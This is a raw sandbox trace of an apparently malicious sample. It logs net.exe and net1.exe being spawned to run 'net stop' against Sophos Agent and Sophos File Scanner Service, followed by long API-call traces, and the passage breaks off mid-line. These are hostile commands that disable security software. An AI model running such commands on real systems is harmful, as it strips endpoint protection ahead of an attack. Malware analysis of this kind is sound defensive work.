[0210.392] LocalFree (hMem=0x263f80) returned 0x0 [0210.392] NetApiBufferFree (Buffer=0x261ca8) returned 0x0 [0210.393] NetApiBufferFree (Buffer=0x261cc0) returned 0x0 [0210.393] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos File Scanner ServiceΓÇ¥ /y" [0210.393] exit (_Code=1) Process: id = "284" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1f68a000" os_pid = "0x4b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Sophos AgentΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 457 os_tid = 0x58c Process: id = "285" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6bb62000" os_pid = "0x2a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "284" os_parent_pid = "0x4b4" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Sophos AgentΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 458 os_tid = 0x228 [0210.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2eff7c | out: lpSystemTimeAsFileTime=0x2eff7c*(dwLowDateTime=0x46ad45c0, dwHighDateTime=0x1d57a87)) [0210.531] GetCurrentProcessId () returned 0x2a8 [0210.531] GetCurrentThreadId () returned 0x228 [0210.531] GetTickCount () returned 0x116e37c [0210.531] QueryPerformanceCounter (in: lpPerformanceCount=0x2eff74 | out: lpPerformanceCount=0x2eff74*=33081554789) returned 1 [0210.531] GetModuleHandleA (lpModuleName=0x0) returned 0x560000 [0210.531] __set_app_type (_Type=0x1) [0210.531] __p__fmode () returned 0x74eb31f4 [0210.531] __p__commode () returned 0x74eb31fc [0210.531] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x56ffe6) returned 0x0 [0210.532] __getmainargs (in: _Argc=0x579064, _Argv=0x57906c, _Env=0x579068, _DoWildCard=0, _StartInfo=0x579024 | out: _Argc=0x579064, _Argv=0x57906c, _Env=0x579068) returned 0 [0210.532] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0210.532] GetConsoleOutputCP () returned 0x1b5 [0210.532] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x579080 | out: lpCPInfo=0x579080) returned 1 [0210.532] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.535] sprintf_s (in: _DstBuf=0x2eff34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0210.535] setlocale (category=0, locale=".437") returned="English_United States.437" [0210.537] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0210.537] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0210.537] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos AgentΓÇ¥ /y" [0210.537] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2efd00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0210.537] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x7c) returned 0x683c20 [0210.537] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0210.537] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2eff04 | out: Buffer=0x2eff04*=0x681c80) returned 0x0 [0210.537] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2eff04 | out: Buffer=0x2eff04*=0x681c98) returned 0x0 [0210.537] _fileno (_File=0x74eb2900) returned -2 [0210.537] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0210.538] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0210.538] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0210.538] _wcsicmp (_String1="config", _String2="stop") returned -16 [0210.538] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0210.538] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0210.538] _wcsicmp (_String1="file", _String2="stop") returned -13 [0210.538] _wcsicmp (_String1="files", _String2="stop") returned -13 [0210.538] _wcsicmp (_String1="group", _String2="stop") returned -12 [0210.538] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0210.538] _wcsicmp (_String1="help", _String2="stop") returned -11 [0210.538] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0210.538] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0210.538] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0210.538] _wcsicmp (_String1="session", _String2="stop") returned -15 [0210.538] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0210.538] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0210.538] _wcsicmp (_String1="share", _String2="stop") returned -12 [0210.538] _wcsicmp (_String1="start", _String2="stop") returned -14 [0210.538] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0210.538] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0210.538] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0210.538] _wcsicmp (_String1="accounts", _String2="ΓÇ£Sophos") returned -850 [0210.538] _wcsicmp (_String1="computer", _String2="ΓÇ£Sophos") returned -848 [0210.538] _wcsicmp (_String1="config", _String2="ΓÇ£Sophos") returned -848 [0210.538] _wcsicmp (_String1="continue", _String2="ΓÇ£Sophos") returned -848 [0210.538] _wcsicmp (_String1="cont", _String2="ΓÇ£Sophos") returned -848 [0210.538] _wcsicmp (_String1="file", _String2="ΓÇ£Sophos") returned -845 [0210.538] _wcsicmp (_String1="files", _String2="ΓÇ£Sophos") returned -845 [0210.538] _wcsicmp (_String1="group", _String2="ΓÇ£Sophos") returned -844 [0210.538] _wcsicmp (_String1="groups", _String2="ΓÇ£Sophos") returned -844 [0210.538] _wcsicmp (_String1="help", _String2="ΓÇ£Sophos") returned -843 [0210.538] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Sophos") returned -843 [0210.538] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Sophos") returned -839 [0210.538] _wcsicmp (_String1="pause", _String2="ΓÇ£Sophos") returned -835 [0210.538] _wcsicmp (_String1="session", _String2="ΓÇ£Sophos") returned -832 [0210.539] _wcsicmp (_String1="sessions", _String2="ΓÇ£Sophos") returned -832 [0210.539] _wcsicmp (_String1="sess", _String2="ΓÇ£Sophos") returned -832 [0210.539] _wcsicmp (_String1="share", _String2="ΓÇ£Sophos") returned -832 [0210.539] _wcsicmp (_String1="start", _String2="ΓÇ£Sophos") returned -832 [0210.539] _wcsicmp (_String1="stats", _String2="ΓÇ£Sophos") returned -832 [0210.539] _wcsicmp (_String1="statistics", _String2="ΓÇ£Sophos") returned -832 [0210.539] _wcsicmp (_String1="stop", _String2="ΓÇ£Sophos") returned -832 [0210.539] _wcsicmp (_String1="time", _String2="ΓÇ£Sophos") returned -831 [0210.539] _wcsicmp (_String1="user", _String2="ΓÇ£Sophos") returned -830 [0210.539] _wcsicmp (_String1="users", _String2="ΓÇ£Sophos") returned -830 [0210.539] _wcsicmp (_String1="msg", _String2="ΓÇ£Sophos") returned -838 [0210.539] _wcsicmp (_String1="messenger", _String2="ΓÇ£Sophos") returned -838 [0210.539] _wcsicmp (_String1="receiver", _String2="ΓÇ£Sophos") returned -833 [0210.539] _wcsicmp (_String1="rcv", _String2="ΓÇ£Sophos") returned -833 [0210.539] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Sophos") returned -837 [0210.539] _wcsicmp (_String1="redirector", _String2="ΓÇ£Sophos") returned -833 [0210.539] _wcsicmp (_String1="redir", _String2="ΓÇ£Sophos") returned -833 [0210.539] _wcsicmp (_String1="rdr", _String2="ΓÇ£Sophos") returned -833 [0210.539] _wcsicmp (_String1="workstation", _String2="ΓÇ£Sophos") returned -828 [0210.539] _wcsicmp (_String1="work", _String2="ΓÇ£Sophos") returned -828 [0210.539] _wcsicmp (_String1="wksta", _String2="ΓÇ£Sophos") returned -828 [0210.539] _wcsicmp (_String1="prdr", _String2="ΓÇ£Sophos") returned -835 [0210.539] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Sophos") returned -847 [0210.539] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Sophos") returned -839 [0210.539] _wcsicmp (_String1="server", _String2="ΓÇ£Sophos") returned -832 [0210.539] _wcsicmp (_String1="svr", _String2="ΓÇ£Sophos") returned -832 [0210.539] _wcsicmp (_String1="srv", _String2="ΓÇ£Sophos") returned -832 [0210.539] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Sophos") returned -839 [0210.539] _wcsicmp (_String1="alerter", _String2="ΓÇ£Sophos") returned -850 [0210.539] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Sophos") returned -837 [0210.539] _wcsicmp (_String1="accounts", _String2="AgentΓÇ¥") returned -4 [0210.539] _wcsicmp (_String1="computer", _String2="AgentΓÇ¥") returned 2 [0210.540] _wcsicmp (_String1="config", _String2="AgentΓÇ¥") returned 2 [0210.540] _wcsicmp (_String1="continue", _String2="AgentΓÇ¥") returned 2 [0210.540] _wcsicmp (_String1="cont", _String2="AgentΓÇ¥") returned 2 [0210.540] _wcsicmp (_String1="file", _String2="AgentΓÇ¥") returned 5 [0210.540] _wcsicmp (_String1="files", _String2="AgentΓÇ¥") returned 5 [0210.540] _wcsicmp (_String1="group", _String2="AgentΓÇ¥") returned 6 [0210.540] _wcsicmp (_String1="groups", _String2="AgentΓÇ¥") returned 6 [0210.540] _wcsicmp (_String1="help", _String2="AgentΓÇ¥") returned 7 [0210.540] _wcsicmp (_String1="helpmsg", _String2="AgentΓÇ¥") returned 7 [0210.540] _wcsicmp (_String1="localgroup", _String2="AgentΓÇ¥") returned 11 [0210.540] _wcsicmp (_String1="pause", _String2="AgentΓÇ¥") returned 15 [0210.540] _wcsicmp (_String1="session", _String2="AgentΓÇ¥") returned 18 [0210.540] _wcsicmp (_String1="sessions", _String2="AgentΓÇ¥") returned 18 [0210.540] _wcsicmp (_String1="sess", _String2="AgentΓÇ¥") returned 18 [0210.540] _wcsicmp (_String1="share", _String2="AgentΓÇ¥") returned 18 [0210.540] _wcsicmp (_String1="start", _String2="AgentΓÇ¥") returned 18 [0210.540] _wcsicmp (_String1="stats", _String2="AgentΓÇ¥") returned 18 [0210.540] _wcsicmp (_String1="statistics", _String2="AgentΓÇ¥") returned 18 [0210.540] _wcsicmp (_String1="stop", _String2="AgentΓÇ¥") returned 18 [0210.540] _wcsicmp (_String1="time", _String2="AgentΓÇ¥") returned 19 [0210.540] _wcsicmp (_String1="user", _String2="AgentΓÇ¥") returned 20 [0210.540] _wcsicmp (_String1="users", _String2="AgentΓÇ¥") returned 20 [0210.540] _wcsicmp (_String1="msg", _String2="AgentΓÇ¥") returned 12 [0210.540] _wcsicmp (_String1="messenger", _String2="AgentΓÇ¥") returned 12 [0210.540] _wcsicmp (_String1="receiver", _String2="AgentΓÇ¥") returned 17 [0210.540] _wcsicmp (_String1="rcv", _String2="AgentΓÇ¥") returned 17 [0210.540] _wcsicmp (_String1="netpopup", _String2="AgentΓÇ¥") returned 13 [0210.540] _wcsicmp (_String1="redirector", _String2="AgentΓÇ¥") returned 17 [0210.540] _wcsicmp (_String1="redir", _String2="AgentΓÇ¥") returned 17 [0210.540] _wcsicmp (_String1="rdr", _String2="AgentΓÇ¥") returned 17 [0210.540] _wcsicmp (_String1="workstation", _String2="AgentΓÇ¥") returned 22 [0210.540] _wcsicmp (_String1="work", _String2="AgentΓÇ¥") returned 22 [0210.540] _wcsicmp (_String1="wksta", _String2="AgentΓÇ¥") returned 22 [0210.540] _wcsicmp (_String1="prdr", _String2="AgentΓÇ¥") returned 15 [0210.541] _wcsicmp (_String1="devrdr", _String2="AgentΓÇ¥") returned 3 [0210.541] _wcsicmp (_String1="lanmanworkstation", _String2="AgentΓÇ¥") returned 11 [0210.541] _wcsicmp (_String1="server", _String2="AgentΓÇ¥") returned 18 [0210.541] _wcsicmp (_String1="svr", _String2="AgentΓÇ¥") returned 18 [0210.541] _wcsicmp (_String1="srv", _String2="AgentΓÇ¥") returned 18 [0210.541] _wcsicmp (_String1="lanmanserver", _String2="AgentΓÇ¥") returned 11 [0210.541] _wcsicmp (_String1="alerter", _String2="AgentΓÇ¥") returned 5 [0210.541] _wcsicmp (_String1="netlogon", _String2="AgentΓÇ¥") returned 13 [0210.541] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0210.541] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.541] wcscpy_s (in: _Destination=0x2efa04, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0210.541] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74a80000 [0210.542] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x2efa00, nSize=0x0, Arguments=0x2ef9fc | out: lpBuffer="嘘hneth.dll") returned 0xff [0210.543] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0210.543] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0210.543] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0210.543] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0210.543] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0210.543] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0210.543] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0210.543] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0210.543] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0210.544] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0210.544] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.544] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0210.544] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0210.544] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0210.544] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.544] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0210.544] _wcsicmp (_String1="CONT", _String2="ΓÇ£Sophos") returned -848 [0210.544] _wcsicmp (_String1="CONT", _String2="AgentΓÇ¥") returned 2 [0210.544] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.544] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0210.544] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.544] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0210.544] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.544] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0210.544] _wcsicmp (_String1="FILES", _String2="ΓÇ£Sophos") returned -845 [0210.544] _wcsicmp (_String1="FILES", _String2="AgentΓÇ¥") returned 5 [0210.544] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.544] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0210.544] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.544] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0210.544] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.544] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0210.544] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Sophos") returned -844 [0210.544] _wcsicmp (_String1="GROUPS", _String2="AgentΓÇ¥") returned 6 [0210.544] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.544] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0210.544] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.544] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0210.544] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.544] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0210.544] _wcsicmp (_String1="REPL", _String2="ΓÇ£Sophos") returned -833 [0210.544] _wcsicmp (_String1="REPL", _String2="AgentΓÇ¥") returned 17 [0210.544] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0210.544] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.544] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0210.545] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Sophos") returned -833 [0210.545] _wcsicmp (_String1="REPLICATOR", _String2="AgentΓÇ¥") returned 17 [0210.545] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.545] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0210.545] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.545] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0210.545] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.545] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0210.545] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Sophos") returned -832 [0210.545] _wcsicmp (_String1="SESSIONS", _String2="AgentΓÇ¥") returned 18 [0210.545] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0210.545] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.545] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0210.545] _wcsicmp (_String1="SESS", _String2="ΓÇ£Sophos") returned -832 [0210.545] _wcsicmp (_String1="SESS", _String2="AgentΓÇ¥") returned 18 [0210.545] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.545] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0210.545] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.545] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0210.545] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.545] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0210.545] _wcsicmp (_String1="STATS", _String2="ΓÇ£Sophos") returned -832 [0210.545] _wcsicmp (_String1="STATS", _String2="AgentΓÇ¥") returned 18 [0210.545] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.545] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0210.545] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.545] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0210.545] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.545] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0210.545] _wcsicmp (_String1="USERS", _String2="ΓÇ£Sophos") returned -830 [0210.545] _wcsicmp (_String1="USERS", _String2="AgentΓÇ¥") returned 20 [0210.545] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.545] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0210.545] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.545] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0210.545] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.546] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0210.546] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Sophos") returned -833 [0210.546] _wcsicmp (_String1="REDIRECTOR", _String2="AgentΓÇ¥") returned 17 [0210.546] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0210.546] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.546] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0210.546] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Sophos") returned -833 [0210.546] _wcsicmp (_String1="REDIR", _String2="AgentΓÇ¥") returned 17 [0210.546] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0210.546] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.546] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0210.546] _wcsicmp (_String1="RDR", _String2="ΓÇ£Sophos") returned -833 [0210.546] _wcsicmp (_String1="RDR", _String2="AgentΓÇ¥") returned 17 [0210.546] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0210.546] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.546] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0210.546] _wcsicmp (_String1="WORK", _String2="ΓÇ£Sophos") returned -828 [0210.546] _wcsicmp (_String1="WORK", _String2="AgentΓÇ¥") returned 22 [0210.546] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0210.546] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.546] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0210.546] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Sophos") returned -828 [0210.546] _wcsicmp (_String1="WKSTA", _String2="AgentΓÇ¥") returned 22 [0210.546] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0210.546] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.546] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0210.546] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Sophos") returned -835 [0210.546] _wcsicmp (_String1="PRDR", _String2="AgentΓÇ¥") returned 15 [0210.546] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0210.546] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.546] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0210.546] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Sophos") returned -847 [0210.546] _wcsicmp (_String1="DEVRDR", _String2="AgentΓÇ¥") returned 3 [0210.546] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.546] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0210.546] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.546] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0210.547] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.547] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0210.547] _wcsicmp (_String1="SVR", _String2="ΓÇ£Sophos") returned -832 [0210.547] _wcsicmp (_String1="SVR", _String2="AgentΓÇ¥") returned 18 [0210.547] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0210.547] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.547] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0210.547] _wcsicmp (_String1="SRV", _String2="ΓÇ£Sophos") returned -832 [0210.547] _wcsicmp (_String1="SRV", _String2="AgentΓÇ¥") returned 18 [0210.547] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.547] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x2efa00, nSize=0x0, Arguments=0x2ef9fc | out: lpBuffer="㻨hꔺ瓡") returned 0x1c [0210.547] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0210.547] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0210.547] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0210.547] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, 